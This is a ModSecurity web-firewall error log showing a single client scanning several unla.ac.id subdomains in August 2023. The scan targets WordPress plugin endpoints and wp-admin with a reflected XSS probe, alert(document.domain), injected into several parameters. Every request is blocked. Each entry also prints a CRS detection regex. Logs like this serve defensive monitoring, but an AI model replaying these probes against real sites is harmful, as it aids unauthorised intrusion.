[Tue Aug 29 11:56:05.712819 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@sewAAAAM"]
[Tue Aug 29 11:56:05.735841 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAq@se0AAAAM"]
[Tue Aug 29 11:56:05.738327 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1wMAAAAV"]
[Tue Aug 29 11:56:05.741788 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApbUvEAAAAh"]
[Tue Aug 29 11:56:06.539130 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZsCo-f0AAApa-SsAAAAg"]
[Tue Aug 29 11:56:06.545687 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAq@se8AAAAM"]
[Tue Aug 29 11:56:06.586191 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw6gAAAAN"]
[Tue Aug 29 11:56:06.627924 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZsCo-f0AAAq@sfEAAAAM"]
[Tue Aug 29 11:56:06.734363 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAApa-TAAAAAg"]
[Tue Aug 29 11:56:06.736187 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw6sAAAAN"]
[Tue Aug 29 11:56:06.788856 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAq@sfUAAAAM"]
[Tue Aug 29 11:56:07.590540 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16Z8Co-f0AAArC7fQAAAAW"]
[Tue Aug 29 11:56:07.594765 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAApbUvYAAAAh"]
[Tue Aug 29 11:56:07.612509 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAArC7fUAAAAW"]
[Tue Aug 29 11:56:07.617289 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6RAAAAAr"]
[Tue Aug 29 11:56:07.623271 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAApa-TMAAAAg"]
[Tue Aug 29 11:56:07.640165 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq5@MUAAAAK"]
[Tue Aug 29 11:56:07.648568 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq@sf0AAAAM"]
[Tue Aug 29 11:56:07.674339 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAArC7fgAAAAW"]
[Tue Aug 29 11:56:07.696670 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6RMAAAAr"]
